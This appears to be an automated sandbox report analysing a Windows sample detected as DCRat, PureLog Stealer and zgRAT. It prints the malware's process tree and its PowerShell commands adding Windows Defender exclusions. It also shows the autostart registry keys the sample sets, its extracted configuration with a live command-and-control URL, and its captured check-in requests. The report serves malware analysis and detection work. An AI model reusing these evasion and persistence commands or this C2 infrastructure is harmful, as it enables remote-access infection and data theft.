Windows Analysis Report
EQdhBjQw4G.exe

Overview

General Information

Sample name: EQdhBjQw4G.exe (renamed because original name is a hash value)
Original sample name: 477DB3DE46B7779B63495A8BDB279F2C.exe
Analysis ID: 1549799
MD5: 477db3de46b7779b63495a8bdb279f2c
SHA1: 77dc3f7d83728294c49298db82dd0e668adc3a73
SHA256: 8b0b6f7ba3c1c98fdc17ceb74e37057793e104dc92aa4d4319d71411b3e56366
Tags: DCRat, exe, user-abuse_ch

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Drops executables to the windows directory (C:\Windows) and starts them
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • EQdhBjQw4G.exe (PID: 908 cmdline: "C:\Users\user\Desktop\EQdhBjQw4G.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
    • csc.exe (PID: 2056 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5czz1opi\5czz1opi.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 5012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 3616 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES790E.tmp" "c:\Windows\System32\CSCF98670F718C4420FABE8D0275D85BFD.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • powershell.exe (PID: 4828 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3616 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7976 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 2256 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1148 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7176 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7220 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\EQdhBjQw4G.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7524 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nQeR8AonhE.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7700 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 7836 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • RuntimeBroker.exe (PID: 8180 cmdline: "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • svchost.exe (PID: 7440 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • RuntimeBroker.exe (PID: 1216 cmdline: "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • EQdhBjQw4G.exe (PID: 3696 cmdline: "C:\Users\user\Desktop\EQdhBjQw4G.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • RuntimeBroker.exe (PID: 7776 cmdline: "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • EQdhBjQw4G.exe (PID: 2228 cmdline: "C:\Users\user\Desktop\EQdhBjQw4G.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • RuntimeBroker.exe (PID: 1376 cmdline: "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • EQdhBjQw4G.exe (PID: 5264 cmdline: "C:\Users\user\Desktop\EQdhBjQw4G.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe (PID: 3384 cmdline: "C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • RuntimeBroker.exe (PID: 2112 cmdline: "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • EQdhBjQw4G.exe (PID: 4556 cmdline: "C:\Users\user\Desktop\EQdhBjQw4G.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • cleanup
{"C2 url": "http://861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal", "MUTEX": "DCR_MUTEX-fMqIIZ3msKTluYQzOgJz", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source | Rule | Description | Author | Strings
EQdhBjQw4G.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
EQdhBjQw4G.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
(3 more entries not shown)

Source | Rule | Description | Author | Strings
00000000.00000000.1639490533.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000002.1721488427.0000000013331000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: EQdhBjQw4G.exe PID: 908 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: RuntimeBroker.exe PID: 8180 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
0.0.EQdhBjQw4G.exe.df0000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.0.EQdhBjQw4G.exe.df0000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

                            System Summary

                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Default User\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe" , CommandLine: "C:\Users\Default User\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe, NewProcessName: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe, OriginalFileName: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\Default User\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe" , ProcessId: 6104, ProcessName: ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\EQdhBjQw4G.exe, ProcessId: 908, TargetFilename: C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\EQdhBjQw4G.exe", ParentImage: C:\Users\user\Desktop\EQdhBjQw4G.exe, ParentProcessId: 908, ParentProcessName: EQdhBjQw4G.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe', ProcessId: 4828, ProcessName: powershell.exe
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe" , CommandLine: "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe, NewProcessName: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe, OriginalFileName: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nQeR8AonhE.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7524, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe" , ProcessId: 8180, ProcessName: RuntimeBroker.exe
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\EQdhBjQw4G.exe, ProcessId: 908, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ROxqvkhuKqPawtyxZXXxveaCsizbJ
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\EQdhBjQw4G.exe, ProcessId: 908, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5czz1opi\5czz1opi.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5czz1opi\5czz1opi.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\EQdhBjQw4G.exe", ParentImage: C:\Users\user\Desktop\EQdhBjQw4G.exe, ParentProcessId: 908, ParentProcessName: EQdhBjQw4G.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5czz1opi\5czz1opi.cmdline", ProcessId: 2056, ProcessName: csc.exe
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\EQdhBjQw4G.exe", ParentImage: C:\Users\user\Desktop\EQdhBjQw4G.exe, ParentProcessId: 908, ParentProcessName: EQdhBjQw4G.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe', ProcessId: 4828, ProcessName: powershell.exe
                            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\EQdhBjQw4G.exe, ProcessId: 908, TargetFilename: C:\Users\user\AppData\Local\Temp\5czz1opi\5czz1opi.cmdline
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\EQdhBjQw4G.exe", ParentImage: C:\Users\user\Desktop\EQdhBjQw4G.exe, ParentProcessId: 908, ParentProcessName: EQdhBjQw4G.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe', ProcessId: 4828, ProcessName: powershell.exe
                            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7440, ProcessName: svchost.exe

                            Data Obfuscation

                            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5czz1opi\5czz1opi.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5czz1opi\5czz1opi.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\EQdhBjQw4G.exe", ParentImage: C:\Users\user\Desktop\EQdhBjQw4G.exe, ParentProcessId: 908, ParentProcessName: EQdhBjQw4G.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5czz1opi\5czz1opi.cmdline", ProcessId: 2056, ProcessName: csc.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-06T03:37:17.712560+0100 | 2022930 | 1 | A Network Trojan was detected | 20.12.23.50 | 443 | 192.168.2.4 | 49731 | TCP
2024-11-06T03:37:57.199859+0100 | 2022930 | 1 | A Network Trojan was detected | 20.109.210.53 | 443 | 192.168.2.4 | 49784 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-06T03:37:15.592448+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 37.44.238.250 | 80 | TCP

                            AV Detection

Source: EQdhBjQw4G.exe, Avira: detected
Source: http://861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.php, Avira URL Cloud: Label: malware
Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\nQeR8AonhE.bat, Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: 00000000.00000002.1721488427.0000000013331000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: DCRat {"C2 url": "http://861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal", "MUTEX": "DCR_MUTEX-fMqIIZ3msKTluYQzOgJz", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe, ReversingLabs: Detection: 65%
Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe, Virustotal: Detection: 52%
Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe, ReversingLabs: Detection: 65%
Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe, Virustotal: Detection: 52%
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe, ReversingLabs: Detection: 65%
Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe, Virustotal: Detection: 52%
Source: C:\Users\user\Desktop\CnTGBqTF.log, ReversingLabs: Detection: 23%
Source: C:\Users\user\Desktop\vTqzCdqK.log, ReversingLabs: Detection: 23%
Source: C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe, ReversingLabs: Detection: 65%
Source: EQdhBjQw4G.exe, ReversingLabs: Detection: 65%
Source: EQdhBjQw4G.exe, Virustotal: Detection: 52%
Source: Submited Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\nmJRokpY.log, Joe Sandbox ML: detected
Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe, Joe Sandbox ML: detected
Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\FpFoWZYA.log, Joe Sandbox ML: detected
Source: EQdhBjQw4G.exe, Joe Sandbox ML: detected
Source: EQdhBjQw4G.exe, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: EQdhBjQw4G.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\5czz1opi\5czz1opi.pdb source: EQdhBjQw4G.exe, 00000000.00000002.1680880366.0000000003B7D000.00000004.00000800.00020000.00000000.sdmp

                            Spreading

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Users\user\Desktop\EQdhBjQw4G.exe, File opened: C:\Users\user
Source: C:\Users\user\Desktop\EQdhBjQw4G.exe, File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\EQdhBjQw4G.exe, File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\EQdhBjQw4G.exe, File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\EQdhBjQw4G.exe, File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\EQdhBjQw4G.exe, File opened: C:\Users\user\AppData\Local

                            Networking

Source: Network traffic, Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49730 -> 37.44.238.250:80
Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: Joe Sandbox View, IP Address: 37.44.238.250 37.44.238.250
Source: Joe Sandbox View, ASN Name: HARMONYHOSTING-ASFR HARMONYHOSTING-ASFR
Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:49731
Source: Network traffic, Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49784
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 384Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1252Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 151876Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 861848cm.nyashkoon.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
